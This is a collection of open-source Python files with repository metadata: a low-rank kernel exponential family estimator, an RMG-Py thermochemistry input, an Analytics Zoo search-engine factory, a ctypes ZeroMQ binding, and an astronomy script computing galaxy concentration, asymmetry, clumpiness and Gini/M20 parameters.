self.inc_cholesky = incomplete_cholesky_gaussian(self.X, self.sigma, eta=self.eta)
L_X = self.inc_cholesky["R"].T
logger.debug("Incomplete Cholesky using rank %d/%d capturing %.3f/1.0 of the variance " % \
(len(self.inc_cholesky['I']), len(self.X), self.eta))
# start optimisation from previous alpha
alpha0 = self.alpha if len(self.alpha) == len(self.X) and len(self.alpha) > 0 else np.zeros(len(self.X))
return fit(self.X, self.X, self.sigma, self.lmbda, L_X, L_X, self.cg_tol, self.cg_maxiter, alpha0)
def objective(self, X):
assert_array_shape(X, ndim=2, dims={1: self.D})
L_X = self.inc_cholesky["R"].T
L_Y = incomplete_cholesky_new_points_gaussian(self.X, X, self.sigma, self.inc_cholesky['I'], self.inc_cholesky['R'], self.inc_cholesky['nu']).T
b = compute_b(self.X, X, L_X, L_Y, self.sigma)
return objective(self.X, X, self.sigma, self.lmbda, self.alpha, L_X, L_Y, b)
class KernelExpLiteGaussianLowRankAdaptive(KernelExpLiteGaussianLowRank):
def __init__(self, sigma, lmbda, D, N, eta=0.1, cg_tol=1e-3, cg_maxiter=None,
num_initial_evaluations=3, num_evaluations=3, minimum_size_learning=100,
num_initial_evaluations_relearn=1, num_evaluations_relearn=1,
param_bounds={'sigma': [-3,3]}):
KernelExpLiteGaussianLowRank.__init__(self, sigma, lmbda, D, N, eta, cg_tol, cg_maxiter)
self.bo = None
self.param_bounds = param_bounds
self.num_initial_evaluations = num_initial_evaluations
self.num_iter = num_evaluations
self.minimum_size_learning = minimum_size_learning
self.n_initial_relearn = num_initial_evaluations_relearn
self.n_iter_relearn = num_evaluations_relearn
self.learning_parameters = False
def fit(self, X):
# avoid infinite recursion from x-validation fit call
if not self.learning_parameters and len(X)>=self.minimum_size_learning:
self.learning_parameters = True
if self.bo is None:
logger.info("Bayesian optimisation from scratch.")
self.bo = BayesOptSearch(self, X, self.param_bounds, n_initial=self.num_initial_evaluations)
best_params = self.bo.optimize(self.num_iter)
else:
logger.info("Bayesian optimisation using prior model.")
self.bo.re_initialise(X, self.n_initial_relearn)
best_params = self.bo.optimize(self.n_iter_relearn)
self.set_parameters_from_dict(best_params)
self.learning_parameters = False
logger.info("Learnt %s" % str(self.get_parameters()))
# standard fit call from superclass
KernelExpLiteGaussianLowRank.fit(self, X)
|
karlnapf/kernel_exp_family
|
kernel_exp_family/estimators/lite/gaussian_low_rank.py
|
Python
|
bsd-3-clause
| 8,178
|
[
"Gaussian"
] |
b0193745d740cb95ca4c05780eda2f9a781b17048eb01e25444d867fbb9eb2bb
|
database(
thermoLibraries = ['primaryThermoLibrary', 'GRI-Mech3.0']
)
species(
label='DIPK',
structure=SMILES("CC(C)C(=O)C(C)C"),
)
species(
label='O2',
structure=SMILES("[O][O]"),
)
species(
label='R_tert',
structure=SMILES("CC(C)C(=O)[C](C)C"),
)
species(
label='R_pri',
structure=SMILES("CC(C)C(=O)C(C)[CH2]"),
)
species(
label='Cineole',
structure=SMILES('CC12CCC(CC1)C(C)(C)O2'),
)
quantumMechanics(
software='mopac',
method='pm3',
onlyCyclics = True,
maxRadicalNumber = 0,
)
|
chatelak/RMG-Py
|
examples/thermoEstimator/input.py
|
Python
|
mit
| 546
|
[
"MOPAC"
] |
03f1d775fbd49f92f148fad22ceae3b0029a643837b4fbdc67c6501bf123ba96
|
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .base import *
from .tensorboardlogger import TensorboardLogger
class SearchEngineFactory:
@staticmethod
def create_engine(backend="ray", *args, **kwargs):
if backend == "ray":
from zoo.orca.automl.search.ray_tune import RayTuneSearchEngine
return RayTuneSearchEngine(*args, **kwargs)
|
intel-analytics/analytics-zoo
|
pyzoo/zoo/orca/automl/search/__init__.py
|
Python
|
apache-2.0
| 923
|
[
"ORCA"
] |
c760ad5513726b9885988a5b4456085f6da4c965124868a824f021f488fcf58c
|
# -*- coding: utf-8 -*-
"""
Low-level ctypes binding for the ZeroMQ library.
Makes an attempt to emulate pyzmq.core.
"""
# Copyright © 2011 Daniel Holth
#
# Derived from original pyzmq © 2010 Brian Granger
#
# This file is part of pyzmq-ctypes
#
# pyzmq-ctypes is free software; you can redistribute it and/or modify it
# under the terms of the Lesser GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# pyzmq-ctypes is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the Lesser GNU General Public
# License for more details.
#
# You should have received a copy of the Lesser GNU General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
import random
from ctypes import *
from ctypes.util import find_library
from ctypes_configure import configure
class CConfigure(object):
_compilation_info_ = configure.ExternalCompilationInfo(
includes = ['zmq.h'],
libraries = ['zmq']
)
size_t = configure.SimpleType('size_t', c_long)
for cname in ['ZMQ_AFFINITY', 'ZMQ_DOWNSTREAM', 'EADDRINUSE',
'EADDRNOTAVAIL', 'EAGAIN', 'ECONNREFUSED', 'EFAULT', 'EFSM',
'EINPROGRESS', 'EINVAL', 'EMTHREAD', 'ENETDOWN', 'ENOBUFS',
'ENOCOMPATPROTO', 'ENODEV', 'ENOMEM', 'ENOTSUP', 'EPROTONOSUPPORT',
'ETERM', 'ZMQ_FORWARDER', 'ZMQ_HWM', 'ZMQ_IDENTITY', 'ZMQ_MCAST_LOOP',
'ZMQ_NOBLOCK', 'ZMQ_PAIR', 'ZMQ_POLLERR', 'ZMQ_POLLIN', 'ZMQ_POLLOUT',
'ZMQ_PUB', 'ZMQ_PULL', 'ZMQ_PUSH', 'ZMQ_QUEUE', 'ZMQ_RATE', 'ZMQ_RCVBUF',
'ZMQ_RCVMORE', 'ZMQ_RECOVERY_IVL', 'ZMQ_REP', 'ZMQ_REQ', 'ZMQ_SNDBUF',
'ZMQ_SNDMORE', 'ZMQ_STREAMER', 'ZMQ_SUB', 'ZMQ_SUBSCRIBE', 'ZMQ_SWAP',
'ZMQ_UNSUBSCRIBE', 'ZMQ_UPSTREAM', 'ZMQ_XREP', 'ZMQ_XREQ', 'ZMQ_MAX_VSM_SIZE',
'ZMQ_FD', 'ZMQ_EVENTS', 'ZMQ_TYPE', 'ZMQ_LINGER', 'ZMQ_RECONNECT_IVL',
'ZMQ_BACKLOG', 'ZMQ_DEALER', 'ZMQ_ROUTER']:
pyname = cname.split('_', 1)[-1]
setattr(CConfigure, pyname, configure.ConstantInteger(cname))
info = configure.configure(CConfigure)
globals().update(info)
# collections of sockopts, based on type:
bytes_sockopts = [SUBSCRIBE, UNSUBSCRIBE, IDENTITY]
int64_sockopts = [HWM, SWAP, AFFINITY, RATE, RECOVERY_IVL,
MCAST_LOOP, SNDBUF, RCVBUF, RCVMORE]
int_sockopts = [FD, EVENTS, TYPE, LINGER, RECONNECT_IVL, BACKLOG]
class ZMQBaseError(Exception): pass
class ZMQError(ZMQBaseError):
def __init__(self, errno=None):
if errno is None:
errno = get_errno()
self.strerror = zmq_strerror(errno)
self.errno = errno
def __str__(self):
return self.strerror
def _check_nonzero(result, func, arguments):
if result == -1:
raise ZMQError(get_errno())
return result
def _check_not_null(result, func, arguments):
if result is None:
raise ZMQError(get_errno())
return result
def _check_zmq_errno(result, func, arguments):
errno = get_errno()
if errno != 0:
raise ZMQError(errno)
return result
libzmq = CDLL(find_library("zmq"), use_errno=True)
libzmq.zmq_version.restype = None
libzmq.zmq_version.argtypes = [POINTER(c_int)]*3
major = c_int()
minor = c_int()
patch = c_int()
libzmq.zmq_version(byref(major), byref(minor), byref(patch))
__zmq_version__ = tuple((x.value for x in (major, minor, patch)))
def zmq_version():
return '.'.join(map(str, __zmq_version__))
memmove.restype = c_void_p
# Error number as known by the 0MQ library
libzmq.zmq_errno.argtypes = []
libzmq.zmq_strerror.restype = c_char_p
libzmq.zmq_strerror.argtypes = [c_int]
# 0MQ infrastructure
libzmq.zmq_init.restype = c_void_p
libzmq.zmq_init.argtypes = [c_int]
libzmq.zmq_term.restype = c_int # the default
libzmq.zmq_term.argtypes = [c_void_p]
# 0MQ message definition
class zmq_msg_t(Structure):
_fields_ = [
('content', c_void_p),
('flags', c_ubyte),
('vsm_size', c_ubyte),
('vsm_data', c_ubyte*MAX_VSM_SIZE)
]
libzmq.zmq_msg_init.argtypes = [POINTER(zmq_msg_t)]
libzmq.zmq_msg_init.restype = c_int
libzmq.zmq_msg_init_size.restype = c_int
libzmq.zmq_msg_init_size.argtypes = [POINTER(zmq_msg_t), size_t]
# requires a free function:
libzmq.zmq_msg_init_data.restype = c_int
libzmq.zmq_msg_init_data.argtypes = [POINTER(zmq_msg_t), c_void_p, size_t,
c_void_p, c_void_p]
libzmq.zmq_msg_close.restype = c_int
libzmq.zmq_msg_close.argtypes = [POINTER(zmq_msg_t)]
libzmq.zmq_msg_move.argtypes = [POINTER(zmq_msg_t), POINTER(zmq_msg_t)]
libzmq.zmq_msg_copy.argtypes = [POINTER(zmq_msg_t), POINTER(zmq_msg_t)]
libzmq.zmq_msg_data.restype = c_void_p
libzmq.zmq_msg_data.argtypes = [POINTER(zmq_msg_t)]
libzmq.zmq_msg_size.restype = size_t
libzmq.zmq_msg_size.argtypes = [POINTER(zmq_msg_t)]
# 0MQ socket definition
libzmq.zmq_socket.restype = c_void_p
libzmq.zmq_socket.argtypes = [c_void_p, c_int]
libzmq.zmq_socket.errcheck = _check_not_null
libzmq.zmq_close.restype = c_int
libzmq.zmq_close.argtypes = [c_void_p]
libzmq.zmq_setsockopt.restype = c_int
libzmq.zmq_setsockopt.argtypes = [c_void_p, c_int, c_void_p, size_t]
libzmq.zmq_getsockopt.restype = c_int
libzmq.zmq_getsockopt.argtypes = [c_void_p, c_int, c_void_p, POINTER(size_t)]
libzmq.zmq_bind.restype = c_int
libzmq.zmq_bind.argtypes = [c_void_p, c_char_p]
libzmq.zmq_connect.restype = c_int
libzmq.zmq_connect.argtypes = [c_void_p, c_char_p]
libzmq.zmq_send.restype = c_int
libzmq.zmq_send.argtypes = [c_void_p, POINTER(zmq_msg_t), c_int]
libzmq.zmq_recv.restype = c_int
libzmq.zmq_recv.argtypes = [c_void_p, POINTER(zmq_msg_t), c_int]
class zmq_pollitem_t(Structure):
_fields_ = [
('socket', c_void_p),
('fd', c_int),
('events', c_short),
('revents', c_short)
]
libzmq.zmq_poll.restype = c_int
libzmq.zmq_poll.argtypes = [POINTER(zmq_pollitem_t), c_int, c_long]
def _default_errcheck():
for symbol in dir(libzmq):
if symbol.startswith('zmq_'):
fn = getattr(libzmq, symbol)
if fn.errcheck != None:
continue
if fn.restype is c_int:
fn.errcheck = _check_nonzero
elif fn.restype is c_void_p:
fn.errcheck = _check_not_null
def _shortcuts():
for symbol in dir(libzmq):
if symbol.startswith('zmq_') and not symbol in globals():
fn = getattr(libzmq, symbol)
globals()[symbol] = fn
_default_errcheck()
_shortcuts()
# Higher-level interface. Partially copied from pyzmq.
class Context(object):
def __init__(self, io_threads=1):
"""The io_threads argument specifies the size of the ØMQ thread pool to
handle I/O operations. If your application is using only the inproc
transport for messaging you may set this to zero, otherwise set it to
at least one."""
if not io_threads > 0:
raise ZMQError(EINVAL)
self.handle = zmq_init(io_threads)
self.closed = False
def socket(self, kind):
if self.closed:
raise ZMQError(ENOTSUP)
return Socket(self, kind)
def term(self):
rc = zmq_term(self.handle)
self.handle = None
self.closed = True
return rc
class Socket(object):
def __init__(self, context, socket_type):
self.context = context
self.handle = zmq_socket(context.handle, socket_type)
self.socket_type = socket_type
self.closed = False
def _check_closed(self):
if self.closed:
raise ZMQError(ENOTSUP)
def close(self):
zmq_close(self.handle)
self.handle = None
self.closed = True
def bind(self, addr):
if isinstance(addr, unicode):
addr = addr.encode('utf-8')
if not isinstance(addr, bytes):
raise TypeError('expected str, got: %r' % addr)
zmq_bind(self.handle, addr)
def bind_to_random_port(self, addr, min_port=2000, max_port=20000, max_tries=100):
"""s.bind_to_random_port(addr, min_port=2000, max_port=20000, max_tries=100)
Bind this socket to a random port in a range.
Parameters
----------
addr : str
The address string without the port to pass to ``Socket.bind()``.
min_port : int, optional
The minimum port in the range of ports to try.
max_port : int, optional
The maximum port in the range of ports to try.
max_tries : int, optional
The number of attempt to bind.
Returns
-------
port : int
The port the socket was bound to.
Raises
------
ZMQBindError
if `max_tries` reached before successful bind
"""
for i in range(max_tries):
try:
port = random.randrange(min_port, max_port)
self.bind('%s:%s' % (addr, port))
except ZMQError:
pass
else:
return port
raise ZMQBindError("Could not bind socket to random port.")
def connect(self, addr):
"""s.connect(addr)
Connect to a remote 0MQ socket.
Parameters
----------
addr : str
The address string. This has the form 'protocol://interface:port',
for example 'tcp://127.0.0.1:5555'. Protocols supported are
tcp, upd, pgm, inproc and ipc. If the address is unicode, it is
encoded to utf-8 first.
"""
if isinstance(addr, unicode):
addr = addr.encode('utf-8')
if not isinstance(addr, bytes):
raise TypeError('expected str, got: %r' % addr)
zmq_connect(self.handle, addr)
@property
def rcvmore(self):
"""s.rcvmore()
Are there more parts to a multipart message?
Returns
-------
more : bool
whether we are in the middle of a multipart message.
"""
more = self.getsockopt(RCVMORE)
return bool(more)
def getsockopt(self, option):
"""s.getsockopt(option)
Get the value of a socket option.
See the 0MQ documentation for details on specific options.
Parameters
----------
option : str
The name of the option to set. Can be any of:
IDENTITY, HWM, SWAP, AFFINITY, RATE,
RECOVERY_IVL, MCAST_LOOP, SNDBUF, RCVBUF, RCVMORE.
Returns
-------
optval : int, str
The value of the option as a string or int.
"""
self._check_closed()
optval = 0
if option in int64_sockopts:
optval = c_int64(optval)
elif option in int_sockopts:
optval = c_int32(optval)
else:
raise ZMQError(EINVAL)
optlen = size_t(sizeof(optval))
zmq_getsockopt(self.handle, option, byref(optval), byref(optlen))
return optval.value
def setsockopt(self, option, optval):
"""s.setsockopt(option, optval)
Set socket options.
See the 0MQ documentation for details on specific options.
Parameters
----------
option : constant
The name of the option to set. Can be any of: SUBSCRIBE,
UNSUBSCRIBE, IDENTITY, HWM, SWAP, AFFINITY, RATE,
RECOVERY_IVL, MCAST_LOOP, SNDBUF, RCVBUF.
optval : int or str
The value of the option to set.
"""
self._check_closed()
if isinstance(optval, unicode):
raise TypeError("unicode not allowed, use setsockopt_unicode")
if option in bytes_sockopts:
if not isinstance(optval, bytes):
raise TypeError('expected str, got: %r' % optval)
zmq_setsockopt(self.handle, option, optval, len(optval))
elif option in int64_sockopts:
if not isinstance(optval, int):
raise TypeError('expected int, got: %r' % optval)
optval_int64_c = c_int64(optval)
zmq_setsockopt(self.handle, option,
byref(optval_int64_c), sizeof(optval_int64_c))
elif option in int_sockopts:
if not isinstance(optval, int):
raise TypeError('expected int, got: %r' % optval)
optval_int32_c = c_int32(optval)
zmq_setsockopt(self.handle, option,
byref(optval_int32_c), sizeof(optval_int32_c))
else:
raise ZMQError(EINVAL)
def send(self, data, flags=0, copy=True, track=False):
"""s.send(data, flags=0, copy=True, track=False)
Send a message on this socket.
This queues the message to be sent by the IO thread at a later time.
Parameters
----------
data : object, str, Message
The content of the message.
flags : int
Any supported flag: NOBLOCK, SNDMORE.
copy : bool
Should the message be sent in a copying or non-copying manner.
track : bool
Should the message be tracked for notification that ZMQ has
finished with it? (ignored if copy=True)
Returns
-------
None : if `copy` or not track
None if message was sent, raises an exception otherwise.
MessageTracker : if track and not copy
a MessageTracker object, whose `pending` property will
be True until the send is completed.
Raises
------
TypeError
If a unicode object is passed
ValueError
If `track=True`, but an untracked Message is passed.
ZMQError
If the send does not succeed for any reason.
"""
self._check_closed()
if isinstance(data, unicode):
raise TypeError("unicode not allowed, use send_unicode")
if not isinstance(data, bytes):
raise TypeError('expected str, got: %r' % data)
flags = c_int(flags)
msg = zmq_msg_t()
msg_c_len = len(data)
zmq_msg_init_size(byref(msg), msg_c_len)
msg_buf = zmq_msg_data(byref(msg))
msg_buf_size = zmq_msg_size(byref(msg))
memmove(msg_buf, data, msg_buf_size)
return zmq_send(self.handle, byref(msg), flags)
def recv(self, flags=0, copy=True, track=False):
"""s.recv(flags=0, copy=True, track=False)
Receive a message.
Parameters
----------
flags : int
Any supported flag: NOBLOCK. If NOBLOCK is set, this method
will raise a ZMQError with EAGAIN if a message is not ready.
If NOBLOCK is not set, then this method will block until a
message arrives.
copy : bool
Should the message be received in a copying or non-copying manner?
If False a Message object is returned, if True a string copy of
message is returned.
track : bool
Should the message be tracked for notification that ZMQ has
finished with it? (ignored if copy=True)
Returns
-------
msg : str, Message
The returned message. If `copy` is False, then it will be a Message,
otherwise a str.
Raises
------
ZMQError
for any of the reasons zmq_recvmsg might fail.
"""
self._check_closed()
flags = c_int(flags)
msg = zmq_msg_t()
zmq_msg_init(byref(msg))
try:
zmq_recv(self.handle, byref(msg), flags)
data = zmq_msg_data(byref(msg))
data_size = zmq_msg_size(byref(msg))
return string_at(data, data_size)
finally:
zmq_msg_close(byref(msg))
def _poll(sockets, timeout=-1):
"""_poll(sockets, timeout=-1)
Poll a set of 0MQ sockets, native file descs. or sockets.
Parameters
----------
sockets : list of tuples of (socket, flags)
Each element of this list is a two-tuple containing a socket
and a flags. The socket may be a 0MQ socket or any object with
a ``fileno()`` method. The flags can be zmq.POLLIN (for detecting
for incoming messages), zmq.POLLOUT (for detecting that send is OK)
or zmq.POLLIN|zmq.POLLOUT for detecting both.
timeout : int
The number of milliseconds to poll for. Negative means no timeout.
"""
if major.value < 3:
# timeout is us in 2.x, ms in 3.x
# expected input is ms (matches 3.x)
timeout = 1000 * timeout
n_sockets = len(sockets)
array_type = zmq_pollitem_t * n_sockets
pollitems = array_type()
for i, (s, events) in enumerate(sockets):
if isinstance(s, Socket):
pollitems[i].socket = s.handle
pollitems[i].events = events
pollitems[i].revents = 0
elif isinstance(s, int_t):
pollitems[i].socket = NULL
pollitems[i].fd = s
pollitems[i].events = events
pollitems[i].revents = 0
elif hasattr(s, 'fileno'):
try:
fileno = int(s.fileno())
except:
raise ValueError('fileno() must return an valid integer fd')
else:
pollitems[i].socket = NULL
pollitems[i].fd = fileno
pollitems[i].events = events
pollitems[i].revents = 0
else:
raise TypeError(
"Socket must be a 0MQ socket, an integer fd or have "
"a fileno() method: %r" % s
)
zmq_poll(pollitems, n_sockets, timeout)
results = []
for i, (s, _) in enumerate(sockets):
# Return the fd for sockets, for compat. with select.poll.
if hasattr(s, 'fileno'):
s = s.fileno()
revents = pollitems[i].revents
# Only return sockets with non-zero status for compat. with select.poll.
if revents > 0:
results.append((s, revents))
return results
class Poller(object):
"""Poller()
A stateful poll interface that mirrors Python's built-in poll.
"""
def __init__(self):
self.sockets = {}
def register(self, socket, flags=POLLIN|POLLOUT):
"""p.register(socket, flags=POLLIN|POLLOUT)
Register a 0MQ socket or native fd for I/O monitoring.
register(s,0) is equivalent to unregister(s).
Parameters
----------
socket : zmq.Socket or native socket
A zmq.Socket or any Python object having a ``fileno()``
method that returns a valid file descriptor.
flags : int
The events to watch for. Can be POLLIN, POLLOUT or POLLIN|POLLOUT.
If `flags=0`, socket will be unregistered.
"""
if flags:
self.sockets[socket] = flags
elif socket in self.sockets:
# uregister sockets registered with no events
self.unregister(socket)
else:
# ignore new sockets with no events
pass
def modify(self, socket, flags=POLLIN|POLLOUT):
"""p.modify(socket, flags=POLLIN|POLLOUT)
Modify the flags for an already registered 0MQ socket or native fd.
"""
self.register(socket, flags)
def unregister(self, socket):
"""p.unregister(socket)
Remove a 0MQ socket or native fd for I/O monitoring.
Parameters
----------
socket : Socket
The socket instance to stop polling.
"""
del self.sockets[socket]
def poll(self, timeout=None):
"""p.poll(timeout=None)
Poll the registered 0MQ or native fds for I/O.
Parameters
----------
timeout : float, int
The timeout in milliseconds. If None, no `timeout` (infinite). This
is in milliseconds to be compatible with ``select.poll()``. The
underlying zmq_poll uses microseconds and we convert to that in
this function.
"""
if timeout is None:
timeout = -1
timeout = int(timeout)
if timeout < 0:
timeout = -1
return _poll(list(self.sockets.items()), timeout=timeout)
|
svpcom/pyzmq-ctypes
|
zmq/_zmq.py
|
Python
|
lgpl-3.0
| 20,637
|
[
"Brian"
] |
def77c2b146607bd771e6c60178fecf64de7aa6bad785464068de89a0c96dc21
|
import os
import csv
from os.path import exists
import pyfits
import numpy as np
import numpy.ma as ma
from concfunc import concentration
from asymfunc import asymmetry
from clumfunc import clumpness
from ginifunc_modi import gini
from runsexfunc import RunSex
from flagfunc import GetFlag, SetFlag
import pymorphutils as ut
import config as c
class CasGm:
"""The class which will find CASGM parameters. The algorithm for each
parameters can be found in the corresponding class files. This will
also write a file agm_result_with_radius.csv which gives the Asymmetry
Gini Coefficient and M20 parameters at different radius from the center
of the galaxy"""
def __init__(self, cutimage, maskimage, xcntr, ycntr, bxcntr, bycntr, eg, pa, sky, skysig):
self.cutimage = cutimage
self.maskimage = maskimage
self.xcntr = xcntr
self.ycntr = ycntr
self.bxcntr = bxcntr
self.bycntr = bycntr
self.eg = eg
self.pa = pa
self.sky = sky
self.skysig = skysig
self.casgm = casgm(cutimage, maskimage, xcntr, ycntr, bxcntr, bycntr, eg, pa, sky, skysig)
def casgm(self):
# following till END will find better center of image
FoundNewCntr = 0
if self.xcntr > 35.0 or self.ycntr > 35.0:
dectThre = 18.0
else:
dectThre = 12.0
while FoundNewCntr == 0:
RunSex(sex_params, SEX_PATH,
os.path.join(c.datadir, self.cutimage), 'None',
'CaSsEx.cat', dectThre, dectThre, 1)
for line in open('CaSsEx.cat', 'r'):
try:
values = line.split()
if abs(float(values[1]) - xcntr) < 4.001 and \
abs(float(values[2]) - ycntr) < 4.001:
xcntr = float(values[1]) - 1.0
ycntr = float(values[2]) - 1.0
FoundNewCntr = 1
except:
pass
for myfile in ['CaSsEx.cat', 'CaSsEx.cat.sex']:
if os.access(myfile, os.F_OK):
os.remove(myfile)
if dectThre < 2.0:
dectThre -= 0.5
else:
dectThre -= 2.0
if dectThre == 0:
xcntr = xcntr
ycntr = ycntr
FoundNewCntr = 1
# END
angle = c.angle
back_extraction_radius = c.back_extraction_radius
# open cutimage
f = pyfits.open(os.path.join(c.datadir, self.cutimage))
z = f[0].data
header = f[0].header
if ('sky' in header):
#sky = header['sky']
print('Header has a sky value key. If you want to use that')
print('uncomment line number 75 in casgm.py')
f.close()
try:
print("Initial background Center >>> ({}, {})".format( self.back_ini_xcntr, self.back_ini_ycntr))
casgmrun = 1
except:
casgmrun = 0
ut.WriteError('Failed to find the background region!!!\n')
z = z - sky
f = pyfits.open(maskimage)
mask = f[0].data
f.close()
maskedgalaxy = ma.masked_array(z, mask)
z = ma.filled(maskedgalaxy, 0.0) # filling 0 in mask regions
########################
# CONCENTRATION #
########################
if(casgmrun):
try:
ApErTuRe = c.aperture
except:
print('aperture keyword is not found in config.py. Setting '\
'circular')
ApErTuRe = 1
if ApErTuRe:
con = concentration(z, mask, xcntr, ycntr, 0.0, 0.0, sky)
else:
con = concentration(z, mask, xcntr, ycntr, pa - 90.0, eg, sky)
extraction_radius = con.TotRad
r20 = con.r20
r50 = con.r50
r80 = con.r80
r90 = con.r90
else:
extraction_radius == 9999
if(extraction_radius == 9999):
return 9999, 9999, 9999, 9999, 9999, 9999, 9999, 9999
else:
sigma = 0.25 * extraction_radius / 1.5 # The kernal size for
# clumpiness
print('R20: {}'.format(round(r20, 2)))
print('R50: {}'.format(round(r50, 2)))
print('R80: {}'.format(round(r80, 2)))
print('R90: {}'.format(round(r90, 2)))
print('Total Radius: {}'.format(round(con.TotRad, 2)))
########################
# ASYMMETRY #
########################
try:
asy = asymmetry(cutimage, maskimage, xcntr, ycntr, 0, 0, r50,
extraction_radius, sky, angle, 1, 0)
extraction_radius = asy.image_asymm[8]
ABS_ZSUM = asy.image_asymm[6] * (back_extraction_radius * \
back_extraction_radius) / (extraction_radius * \
extraction_radius * 1.0)
asy_r20 = asymmetry(cutimage, maskimage, xcntr, ycntr, 0, 0,
r50, r20, sky, angle, 1, 0)
ABS_ZSUM_r20 = asy.image_asymm[6] * (r20 * r20) / \
(extraction_radius * extraction_radius * 1.0)
# asy_r20_zsum = asymmetry(cutimage, maskimage, xcntr, ycntr, 0, \
# 0, r50, r20, sky, angle, 0, ABS_ZSUM_r20) This was commented \
# on sep13 as i forgot what this is
asy_r20_zsum = 0 # This line is added to compensate the above
# commenting of line. I have replaced the
# corresponding value to 0 at the line 239
back_asy = asymmetry(cutimage, maskimage, back_ini_xcntr,
back_ini_ycntr, 0, 0, r50,
back_extraction_radius,
sky, angle, 0, ABS_ZSUM)
# asymmetry is not converging w. r. t. the center
if asy.image_asymm[4] > 20 or back_asy.image_asymm[4] > 20:
c.Flag = SetFlag(c.Flag, GetFlag('ASYM_NOT_CONV'))
# the extraction radius is larger than the image size
if asy.image_asymm[5] == 1:
c.Flag = SetFlag(c.Flag, GetFlag('ASYM_OUT_FRAME'))
try:
back_asy1 = asymmetry(cutimage, maskimage,
back_ini_xcntr1, back_ini_ycntr1,
0, 0, r50, back_extraction_radius,
sky, angle, 0, ABS_ZSUM)
ASY = asy.image_asymm[0] - (back_asy.image_asymm[0] +\
back_asy1.image_asymm[0]) / 2.0
ASY_ERROR = 2 * np.sqrt(asy.image_asymm[1]**2 + \
back_asy.image_asymm[1]**2 + back_asy1.image_asymm[1]**2)
except:
ASY = asy.image_asymm[0] - back_asy.image_asymm[0]
ASY_ERROR = 2 * np.sqrt(asy.image_asymm[1]**2 \
+ back_asy.image_asymm[1]**2)
# print asy.image_asymm[0] , back_asy.image_asymm[0]
try:
ASY_ERROR = round(ASY_ERROR, 4)
except:
ASY_ERROR = 9999
# print "ASYMMETRY, ERROR and flag_out A_wo_back BA A20 A20_ZSUM", \
# ASY, ASY_ERROR, asy.image_asymm[5], asy.image_asymm[0], \
# back_asy.image_asymm[0], asy_r20.image_asymm[0],\
# asy_r20_zsum.image_asymm[0]
except:
ASY, ASY_ERROR = 9999, 9999
########################
# CLUMPNESS #
########################
try:
sigma = int(sigma)
if sigma / 2.0 == int(sigma / 2.0):
sigma = sigma + 1.0
clump = clumpness(z, asy.image_asymm[2], asy.image_asymm[3],
0, 0, extraction_radius, sigma, sky, 1)
S1 = 10.0 * clump.clumpness[0] / clump.clumpness[2]
error_S1 = np.sqrt((clump.clumpness[1] + \
clump.clumpness[3] / \
clump.clumpness[4]) * S1**2.0)
if sigma > back_extraction_radius:
back_extraction_radius = sigma + 2.0
back_clump = clumpness(z, back_ini_xcntr, back_ini_ycntr, 0, 0,
back_extraction_radius, sigma, sky, 0)
S2 = 10.0 * back_clump.clumpness[0] / clump.clumpness[2]
error_S2 = np.sqrt((back_clump.clumpness[1] \
+ clump.clumpness[3] \
/ clump.clumpness[4]) * S2**2.0)
try:
back_clump1 = clumpness(z, back_ini_xcntr1,
back_ini_ycntr1, 0, 0,
back_extraction_radius, sigma,
sky, 0)
S3 = 10.0 * back_clump1.clumpness[0] / \
clump.clumpness[2]
error_S3 = np.sqrt((back_clump1.clumpness[1] + \
clump.clumpness[3] / \
clump.clumpness[4]) * S3**2.0)
S = S1 - (S2 +S3) / 2.0
ERROR_SMOO = np.sqrt(error_S1**2.0 + error_S2**2.0 + \
error_S3**2.0)
except:
S = S1 - S2
ERROR_SMOO = np.sqrt(error_S1**2.0 + error_S2**2.0)
try:
ERROR_SMOO = round(ERROR_SMOO, 4)
except:
ERROR_SMOO = 9999
# print "SMOTHNESS AND ERROR ", S, ERROR_SMOO
except:
S, ERROR_SMOO = 9999, 9999
###########################
# GINI COEFFICIENT M20 #
###########################
extraction_radius = con.TotRad # ext. rad was over riden by asym.
gin = gini(z, xcntr, ycntr, 0, 0, r20, r50, r80,
extraction_radius, sky, skysig)
gini_coef = gin.segmentation
# for myfile in ['segmentation.fits']:
# if os.access(myfile,os.F_OK):
# os.remove(myfile)
# Write Model galaxy image
# hdu = pyfits.PrimaryHDU(gin.segmentation.astype(Float32))
# hdu.writeto('segmentation.fits')
# Writing all the casgm parameters to agm_result_with_radius.csv
if exists("agm_result_with_radius.csv"):
pass
else:
f_tmp = open("agm_result_with_radius.csv", "ab")
tmp_writer = csv.writer(f_tmp)
tmp_ParamToWrite = ['gal_id', 'C', 'C_err', 'A', 'A_err',
'A_flag', 'image_A', 'back_A', 'A_20',
'A_20_with_zsum', 'S', 'S_err', 'r20',
'r20e', 'r50', 'r50e', 'r80', 'r80e',
'r90', 'r90e', 'extraction_radius', 'G',
'G_res', 'G80', 'G50', 'G20', 'M',
'M_res', 'M80', 'M50', 'M20']
tmp_writer.writerow(tmp_ParamToWrite)
f_tmp.close()
f_tmp = open("agm_result_with_radius.csv", "ab")
tmp_writer = csv.writer(f_tmp)
tmp_ParamToWrite = [c.fstring, con.concen, con.error_con,
ASY, ASY_ERROR, asy.image_asymm[5],
asy.image_asymm[0], back_asy.image_asymm[0],
asy_r20.image_asymm[0], 0.0, S, ERROR_SMOO,
con.r20, con.r20e, con.r50, con.r50e, con.r80,
con.r80e, con.r90, con.r90e,
extraction_radius, gini_coef[0], gini_coef[1],
gini_coef[2], gini_coef[3], gini_coef[4],
gini_coef[5], gini_coef[6], gini_coef[7],
gini_coef[8], gini_coef[9]]
tmp_writer.writerow(tmp_ParamToWrite)
f_tmp.close()
# check for nan and inf values and overmasking
if np.isnan(con.concen) or np.isinf(con.concen):
con.concen = 9999
if np.isnan(con.error_con) or np.isinf(con.error_con) or isinstance(con.error_con, np.ma.core.MaskedConstant):
#the last test is to see if the error failed because it is overmasked
con.error_con = 9999
